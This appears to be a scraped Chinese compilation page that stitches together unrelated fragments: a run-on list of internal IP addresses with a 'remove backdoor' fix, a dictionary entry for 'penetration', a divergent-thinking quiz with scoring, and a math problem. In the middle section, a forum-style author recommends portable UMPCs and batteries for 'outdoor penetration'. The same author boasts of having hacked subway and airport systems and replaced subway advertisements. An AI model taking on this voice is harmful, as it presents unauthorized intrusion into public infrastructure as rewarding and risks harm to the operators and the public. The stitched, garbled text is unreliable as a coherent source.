10110.1.122.10410.1.122.11210.1.122.11410.1.122.11510.1.122.12010.1.122.12310.1.122.20110.1.122.20210.1.123.10110.1.123.10210.1.123.20110.1.123.20210.1.123.21610.1.123.21710.1.123.23110.1.123.23210.1.123.24410.1.123.24510.1.123.3110.1.125.10110.1.125.15410.1.128.10110.1.128.10210.1.129.10110.1.129.10210.1.16.20110.1.16.20210.1.16.20310.1.16.20410.1.16.20510.1.180.4410.1.20.210.1.20.20110.1.201.110.1.201.10010.1.201.10910.1.201.1110.1.201.11010.1.201.11110.1.201.11210.1.201.11310.1.201.11410.1.201.11610.1.201.12210.1.201.12310.1.201.12410.1.201.12510.1.201.12610.1.201.12910.1.201.13010.1.201.13110.1.201.13210.1.201.13310.1.201.13410.1.201.13510.1.201.13710.1.201.13810.1.201.13910.1.201.14010.1.201.1510.1.201.15510.1.201.15710.1.201.15910.1.201.1610.1.201.16210.1.201.16310.1.201.16410.1.201.16510.1.201.16810.1.201.1710.1.201.17110.1.201.17210.1.201.18910.1.201.210.1.201.20110.1.201.2310.1.201.23610.1.201.23710.1.201.310.1.201.3010.1.201.3110.1.201.3310.1.201.3510.1.201.3610.1.201.3710.1.201.3810.1.201.410.1.201.4010.1.201.4210.1.201.4310.1.201.510.1.201.5210.1.201.5410.1.201.5710.1.201.610.1.201.6710.1.201.6810.1.201.710.1.201.7110.1.201.7210.1.201.7410.1.201.810.1.201.8010.1.201.8410.1.201.8710.1.201.910.1.201.9110.1.202.1010.1.202.10210.1.202.10510.1.202.10610.1.202.10710.1.202.10810.1.202.11010.1.202.11110.1.202.11210.1.202.11310.1.202.11610.1.202.11710.1.202.11810.1.202.11910.1.202.1210.1.202.12010.1.202.12110.1.202.12210.1.202.12310.1.202.12410.1.202.12510.1.202.1810.1.202.1910.1.202.19010.1.202.19110.1.202.19910.1.202.20210.1.202.20510.1.202.20610.1.202.20710.1.202.21310.1.202.21910.1.202.22010.1.202.22110.1.202.22210.1.202.23510.1.202.23710.1.202.23810.1.202.23910.1.202.24010.1.202.24210.1.202.24310.1.202.24410.1.202.2910.1.202.3210.1.202.3310.1.202.3410.1.202.3510.1.202.3610.1.202.3710.1.202.3810.1.202.3910.1.202.4010.1.202.4110.1.202.4210.1.202.4310.1.202.4510.1.202.4710.1.202.4810.1.202.5010.1.202.5110.1.202.6010.1.202.6110.1.202.7110.1.202.9910.1.203.1110.1.203.210.1.203.310.1.203.810.1.60.10910.1.8.310.1.8.410.1.8.510.1.8.610.1.8.710.1.8.810.1.80.110.1.80.1010.1.80.1110.1.80.11010.1.80.1210.1.80.210.1.80.20110.1.80.20210.1.80.310.1.80.3810.1.80.410.1.88.1010.1.88.10210.1.88.18310.1.88.2110.1.88.2210.1.9.110.1.9.1010.1.9.1110.1.9.210.1.9.310.1.9.510.1.9.610.1.96.110.1.96.210.1.99.12410.1.99.14010.10.1.20.2210.10.247.42

解决方案：

全面检查

清除后门

篇11：渗透

渗透

渗透shèn tòu[释义]

①（动）两种气体或两种可以互相混合的'液体；彼此通过多孔性的薄膜而混合。

②（动）液体从物体的细小空隙中透过。

③（动）比喻一种事物或势力逐渐进入到其他方面。经济～。（作谓语）

[构成] 动补式：渗〈透[同义] 渗入

篇12：物理渗透技术介绍武林安全网

当外出的时候，N810做侦查工作，具体深层次的渗透，还是要靠x86架构的机器，来跑windows或者linux，这样才是最有效率的，像上面这台三星Q1U，可以运行完整的windows及linux，软件环境是完善的，想要以一部手机进行完全入侵的想法至少在现阶段是没那么靠谱的，科技在发展，什么时候系统，硬件及电池续航都达到一个平均值的时候，那才是最完美的设备出现之时，

谈到设备，原来在milsec发给帖子，谁知被影子猪那厮在删除论坛的时候一块搞没了，那时候我也没备份，郁闷的我够呛，现在想开了，再写一下吧..

首先，对于喜欢户外渗透的人，我想都是比较接近所谓的本质的人，因为户外渗透的接触到的目标往往都是物理设备，黑掉物理设备带来的效果是最能让你满足的，比如把某某地铁广告系统正在播放的广告替换了，还比如之前我渗透过得地铁、机场等基础设施，搞完都是很有成就感的，所以国内外还是有一大片人对这个感兴趣，也想去自己试一试，所以我也说说..

设备上，我建议是资金允许的情况下，5寸-7寸的UMPC(Ultra Mobile PC)，因为UMPC的架构多数是x86，对软件环境给予了绝对的支持，想用win或linux随你，双系统也是可以的。5寸的多半是平板，比如viliv S5，这种设备没有键盘，都是靠屏幕键盘，如果你想在渗透时候允许linux，或许就会碰到麻烦了，不过可以考外接键盘来实现，但是这样就又违背了便携的概念，虽说OQO也有5寸且有硬键盘的UMPC，但是价格昂贵，爱国者的5寸也是昂贵，而且配置很一般，所以不推荐，

7寸的UMPC，viliv S7，samsung q1u或者sony的UX系列，这些机身都自带硬键盘，而且屏幕尺寸还没用达到上网本的8.9-10寸标准，还算是比较便携，基本一个小包就能到处走了，而且这些价格都不到5k，硬件配置用作渗透的话足够，所以推荐。

补充一下关于不选用上网本的原因，这东西终究是个需要放在腿上或桌子上的东西，户外渗透时，没有多少环境能给你提供如此安逸的状态，使用上网本会让你很不随意，更会招来被围观或者被人鄙视为装B的情况...

除了体积、架构考虑，电池续航也是一个重要的因素，选择设备的时候，对备用电池的考虑也是必须得，像上面所说，viliv s5、s7，这俩一开始就以高续航为卖点，而且厂商很人性化，提供备用电池和座充等产品，价格也都是可以接受的范围，三星的q1u，虽然厂商销售的电池价格昂贵，但是taobao上还是可以搜到许多销售q1u备电的商家，所以选好中意的设备后，也要对该设备电池的供应有所了解，毕竟这东西是个消耗品，万一花大价钱买了个设备，没用多久电池不行了，又买不到替换，那就辶..

最重要的一点就是，如果真喜欢户外渗透，就请随时带着你的设备，因为你永远不可能知道你会碰到什么样的网络环境，如果碰到了，而你又恰恰没有带设备，错过了一次积累经验的好机会，那是很痛苦的，我是深有体会..像我这种宅男很多地方只会去一次，但我去的很多地方都可以搞..至少我认为..

不过我很懒，总是忘带家伙...

篇13：发散思维能力测试介绍及特点是什么

指导语；本测验测试你的发散思维能力，共有8题，每道题都有一定的时间限制，请在规定时间内尽快地完成每道题。

1．请你写出所能想到的带有“土”结构的字，写得越多越好。（时间：5分钟）

2．请列举砖头的各种可能用途。（时间：5分钟）

3．请举出包含“三角形”的各种物品，写得越多越好。（时间：10分钟）

4．尽可能想象“△”和什么东西相似或相近？（时间：10分钟）

5．把下列物件按照性质尽可能分类：鸭、菠菜、石、人、木、菜油、铁。（时间：5分钟）

6．请说出一只猫与一只冰箱相似的地方，说得越多越好。（时间：5分钟）

7．给你两个圆（OO）、两条直线（| |）和两个三角形（△△）请组成各种有意义的图案。（时间：15分钟）

8．请你根据以下故事情节，用简洁的语言（不超过100字）写出故事的各种可能的结尾，写得越多越好。（时间：40分钟）

古时候，有兄弟三人。大哥、二哥好吃懒做，三弟勤劳聪明。三人长大后都成了家。有一天，三兄弟在一起喝酒，大哥、二哥提议：“从现在起，我们三人说话，互相不准怀疑，否则罚米一斗。”酒后，大哥说：“你们总说我好吃懒做，现在家里那只母鸡一报晓，我就起床了……”三弟直摇头说：“哪有母鸡报晓之理？”大哥嘿嘿一笑说：“好！你不信我的话，罚米一斗。”二哥接下去说：“我没有大哥这么勤快，因此家里穷得老鼠撵得猫吱吱叫……”三弟又连连摇头，二哥得意地说：“你不信，也罚米一斗。”后来……

篇14：发散思维能力测试介绍及特点是什么

小刚和小明同时从家里出发相向而行。小刚每分钟走52米，小明每分钟走70米，两人在途中的A处相遇。若小刚提前4分钟出发，且速度不变，小明每分钟走90米，则两人仍在A处相遇。小刚和小明的家相距多少米?

答案

解:设小明第一次到A地的时间为t 则,

小明走了70t米小刚走了52t米

则小明第二次到A地的时间为

70t/90*52=52(t-4)

解得t=18(min)

52t+70t=52*18+70*18=2196(m)

答:小刚和小明的家相距2196米。

发散性思维测试

对想象力的研究最有贡献的，是美国的心理学家J·P，吉尔福特。1949年秋，吉尔福特当选为美国心理学会会长。翌年，他发表了就职演说《论创造力》。这篇演说辞的意义不亚于19法国比奈所提出的智力量表和智商概念。在吉尔福特的《论创造力》以及以后的研究中，他提出这样的观点:在创造性思维过程中，人们可以看到两种情况——发散的过程和辐合(集中)的过程，发散:人从大脑中提取了大重有关的存贮的知识，并通过联想与想象，形成若干备择的思路、想法、方案，发散性思维使人的思维趋于灵活，它的结果是不确定的，常有猜测性质的。集中:在发散的基础上，根据一定的功用目的，综合多种信息，导出一种结果。

发散性思维

想象力走发散性思维的重要环节，为此，在吉尔福特编制的《南加利福尼亚州测验》中，设计了“设想后果”一类的题目。

举个例子:“假如人类变异了，眼睛由两只变成了三只，后果将会如何?”当然这种事情现在是不可能的。但是，用来训练人的联想力，训练人的思维的灵活性，不失为是个好题目。这个题目，你可以写出很多答案:眼镜要重新设计，审美观念会有重要的变化，...

这类题目的评分标准是三个:

流畅性。就某一个问题，要求你做出足够多的数量的答题，数量越多越好。

变通性(灵活性)。要求你能够从一个领域跳跃到另一个领域去思考。例如，从社会的领域跳跃到自然的领域;从历史的领域跳跃到未来的领域。跨度越大越好。

独立性(新奇性)。能想象出前人没有想象到的问题，成缋为最佳。

发散思维(Divergent Thinking)

又称辐射思维、放射思维、扩散思维或求异思维。

是指大脑在思维时呈现的一种扩散状态的思维模式，它表现为思维视野广阔，思维呈现出多维发散状。如“一题多解”、“一事多写”、“一物多用”等方式，培养发散思维能力。不少心理学家认为，发散思维是创造性思维的最主要的特点，是测定创造力的主要标志之一。

发散性思维特点

【流畅性】

流畅性就是观念的自由发挥。指在尽可能短的时间内生成并表达出尽可能多的思维观念以及较快地适应、消化新的思想概念。机智与流畅性密切相关。

流畅性反映的是发散思维的速度和数量特征。

【变通性】

变通性就是克服人们头脑中某种自己设置的僵化的思维框架，按照某一新的方向来思索问题的过程。

变通性需要借助横向类比、跨域转化、触类旁通，使发散思维沿着不同的方面和方向扩散，表现出极其丰富的多样性和多面性。

【独特性】

独特性指人们在发散思维中做出不同寻常的异于他人的新奇反应的能力。独特性是发散思维的最高目标。

【多感官性】

发散性思维不仅运用视觉思维和听觉思维，而且也充分利用其他感官接收信息并进行加工。发散思维还与情感有密切关系。如果思维者能够想办法激发兴趣，产生激情，把信息感性化，赋予信息以感情色彩，会提高发散思维的速度与效果。

计分与解释：

第1~4题，每一个答案为1分；第5题，每一个答案为2分；第6~7题，每一个答案为3分；第8题，每一个答案为5分；然后统计总分。如果你得分在：

100分以上，发散思维的流畅性很好；

81~100分，发散思维的流畅性较好；

61~80分，发散思维的流畅性中等；

41~60分，发散思维的流畅性较差；

40分以下，发散思维的流畅性很差。

流畅性是发散思维的较低层次，比如在列举砖头的用途时，如果能列举出造工房、造烟囱、造仓库、造鸡舍、造礼堂……说明流畅性很好。发散思维的变通性和独特性则分别代表了发散思维的中等层次和高等层次。下面结合每道题的答案进行分析。

1．“土”在右方，如灶、肚、杜等：“土”在左方，如址、墟、增等：“土”在下方，如尘、塑、堂等：“土”在上方，如去、寺、幸等：“土”在中间，如庄、崖、匡等；全部由“土”构成的字，如土、圭等；或“土”蕴含在字中，如来、奔、戴等；以及其它，如盐、硅等。在上述“发散”中，能写出中两类含“土”的字，则说明思维已具有一定的变通性，因此此时的“土”已不像前面几种“土”那么显而易见了。

2．列举砖头的用途，如果说出了造工房、造烟囱、造仓库、造鸡舍、造礼堂……只能说明你的发散思维处于较低级的阶段，因为你所列举的各种用途，其实都属于同一类型：用于建筑材料。如果你还回答出打狗、赶猫、敲钉子、做家具垫脚、铺路、压东西、自卫武器等等，你的思维就具有一定的变通性，因为上述用途已涉及到几种不同的类别。如果你的答案是一般人所难想到的，你的发散思维就具有一定独特性。

3．包含“三角形”的物品大致有以下几类：1、物品中所包含的正规三角形，如红领巾、三角旗、三角形铅笔等；2、物品含近似三角形，如金字塔、衣钩、山岳形积木等；3、物品中含有三角形的三个角的特点，构成主观三角形，如三脚插座、三极管、斜面等。4、立体三角形，如锥体、漏斗、衣帽架、舞蹈造型等。说出的种类越多，说明发散思维的变通性越好；每一种类中说出的物品越多，说明发散思维的流畅性越好。

4．和“△”相似或相近的东西有：馒头、涵洞、峭石、山峰、堡垒、城门、隧道口、喷水池、橱窗、问讯窗口、尼龙秧棚、坟墓、萌芽、彩虹、乌篷船、抛物红、仙鹤戏水、镜片、电视机屏幕、枪洞、子弹头、树荫、海上日出、跳水、弯腰、插秧、拱桥、盾牌、活页木铁夹、天边浮云、英文字母“D”等等。回答得越多，发散思维的流畅程度越高。

5．这些物体可分为以下类型：

植物：菠菜、木

动物：鸭、人

生物：菠菜、木、鸭、人

食物：菠菜、菜油、鸭

矿物：石、铁

含铁物体：铁、菠菜

浮水性强的物体：木、菜油、鸭

常用泥性种植的产品：菠菜、木、菜油

燃料：木、菜油

建筑材料：木、石、铁

以上的分类肯定没有把全部可能的分类都包括在内，你可以运用自己的思维发散能力创造新的分类，创造的类别越多，你的发散思维能力越强。

6．猫和冰箱的相似之处相当之多：两者都有放“鱼”的地方；都有“尾巴”（冰箱后部的电线犹如“尾巴”）；都有颜色等等。

7．两个圆、两条直线和两个三角形，可以组成各种有意义的图案。比如：从具体形象出发，可组成“人脸”或组成“落日与山的倒影”；也可从抽象角度考虑，组成等式：△○=○△；还可以把抽象与具体结合起来，组成 “△|○○△”，表示两山（具体）相距100米（抽象）等。上述图案组成得越多，表示你的发散思维的流畅性和变通程度越高。

8．此题没有固定的答案，你可借题发挥，所写的故事结尾越多、越离奇，说明你的总体发散思维能力越高。